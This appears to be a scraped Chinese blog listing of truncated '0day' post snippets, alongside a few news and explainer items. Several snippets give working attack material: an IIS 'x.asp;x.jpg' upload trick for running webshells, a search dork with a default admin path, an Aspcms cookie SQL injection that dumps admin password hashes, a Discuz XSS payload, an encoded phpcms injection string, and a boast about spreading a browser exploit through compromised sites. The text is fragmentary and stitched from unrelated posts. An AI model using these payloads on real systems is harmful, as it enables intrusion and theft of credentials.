# Java 0day漏洞科普
## 引言
在计算机安全领域,0day漏洞是指恶意攻击者利用尚未被软件开发者或供应商发现的软件安全漏洞。本文将介绍Java 0day漏洞的相关概念,以及如何预防和修复这些漏洞。
## 什么是Java 0day漏洞?
Java是一种广泛应用于跨平台开发的编程语言。由于Java应用程序可以在不同的操作系统和硬件上运行,因此它成为恶意攻击者攻击的目标之一。Java            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2023-08-07 14:49:13
                            
                                38阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            当上传图片为x.asp;x.jpg时,IIS会自动解析为asp格式,所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2010-08-10 22:41:32
                            
                                350阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            百度关键字:inurl:index.php?ac=article&at=read&did=
===========================================================================================================
默认后台:adminsoft/index.php              
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2011-12-05 21:35:33
                            
                                558阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            当上传图片为x.asp;x.jpg时,IIS会自动解析为asp格式,所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;x.jpg也是可以执行的。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2009-09-06 17:46:50
                            
                                374阅读
                            
                                                                                    
                                1评论
                            
                                                 
                 
                
                             
         
            
            
            
            不知道是不是国内首发.17号在ST核心群拿到的,18号在虚拟机2003SERVER ie7 测试成功。不过免杀做的不好一样被杀。趁国内没有大规模更新补丁之前,在webshell上大肆放马,命中率还是挺高的。下面是生成后的页面代码,其他文件就不发了.大家有兴趣可以看下---------------------------------------------------生成器代码不发了。希望开始发的几            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2012-07-05 11:30:34
                            
                                4111阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            简单说下利用的方法吧。 点击图片上传后会出现上传页面,地址为http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=用普通的图片上传后,地址为 http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&am            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2012-07-09 09:31:40
                            
                                556阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            虽然还是很鸡肋(要求根目录下存在config文件夹且可写),不过好很多了。可以无视session.auto_start配置了。
 
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - ph            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2011-07-13 10:42:50
                            
                                658阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            转自  http://www.exp-sky.org/cve-2013-1347-microsoft-internet-explorer-cgenericelement-object-use-after-free-0day-vulnerabilityCVE-2013-1347 Microsoft Internet Explorer CGenericElement Object Use A            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2013-05-13 11:28:55
                            
                                905阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            来源:坏狼安全网// 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extra            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2007-11-26 18:21:20
                            
                                10000+阅读
                            
                                                                                    
                                3评论
                            
                                                 
                 
                
                             
         
            
            
            
             
导读: 
   
  看代码UserPay.asp行12-64 
  If Request("raction")="alipay_return" Then 
  AliPay_Return() 
  Dvbbs.Footer() 
  Response.End 
  ElseIf Request("action&quo            
                
                    
                        
                                                            
                                                                        
                                                                                        原创
                                                                                    
                            2008-01-10 20:08:00
                            
                                1115阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            0day是指那些没有公开因而也没有补丁的漏洞。也就是通常所说的“未公开漏洞”
 
http://news.ccw.com.cn/internet/htm2009/20090531_633200.shtml
 
5月31日消息,微软公司近日发布安全建议(971778),证实Windows XP等操作系统存在一个“DirectShow视频开发包”高风险的安全漏洞。一旦该0d            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2009-05-31 23:23:39
                            
                                2186阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            事实上非常多工具多少都使用的比較熟悉了。可是仍有一些点还是比較有趣以及我不知道的。毕竟第一章,查缺补漏的。 (话说这个成语在高三冲刺的时候,老师用得最多,当时还非常悲哀的一直补东墙。漏西墙。始终认为自己学习的混沌,不成体系= =) 直接回来看内容好了。 总结下来,几个术语: Penetration            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2016-04-09 16:49:00
                            
                                81阅读
                            
                                                                             
                 
                
                             
         
            
            
            
             发一下去年利用discuz鸡肋xss的一个思路和具体代码。
discuz x系列以下所有版本的个人资料设置中的个人签名一项存在一个持久型的XSS漏洞:比如在修改个人签名,提交</textarea><script>alert(1)</script>,就能执行脚本。
这个XSS的利用场景比较特殊,必须在个人资料设置页里才能触发,也就是只有自己才能看到            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2011-01-18 20:59:24
                            
                                1433阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            Aspcms 1.5 COOKIES注入0day,注册一个帐号。然后登陆后修改COOKIES的USERID值
在后面加上注入语句:
UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
然后编辑帐号就能看到管理员的帐号和MD5密码值            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2011-12-27 23:11:20
                            
                                781阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            世界上并不存在某个叫做“warez”或者“0day”这样“邪恶”的组织,“0day”是一种自发的网络运动而已,“warez”是对破解的泛称;如果有人说他属于“0day组织”,并不是说他真的在一个叫做“0day”的破解组织里干活,其真正涵义是他属于某个破解组织,而这个组织经常向0day 发布作品。            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2008-07-01 13:35:02
                            
                                795阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            把任意商品加入购物车在填写配送地址那一页,有地区选择flow.php?step=consignee&direct_shopping=1比如省选择安徽其中POST数据如下country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&addres            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                            精选
                                                        
                            2014-11-03 22:23:09
                            
                                839阅读
                            
                                                                             
                 
                
                             
         
            
            
            
            index.php?m=member&c=index&a=login 后缀username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2015-11-25 15:16:00
                            
                                358阅读
                            
                                                                                    
                                2评论
                            
                                                 
                 
                
                             
         
            
            
            
            4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。 知道创宇给出三种临时解决方案: 方案一:临时补丁,            
                
                    
                        
                                                            
                                                                        
                                                                                        转载
                                                                                    
                            2016-07-10 17:19:00
                            
                                305阅读
                            
                                                                                    
                                2评论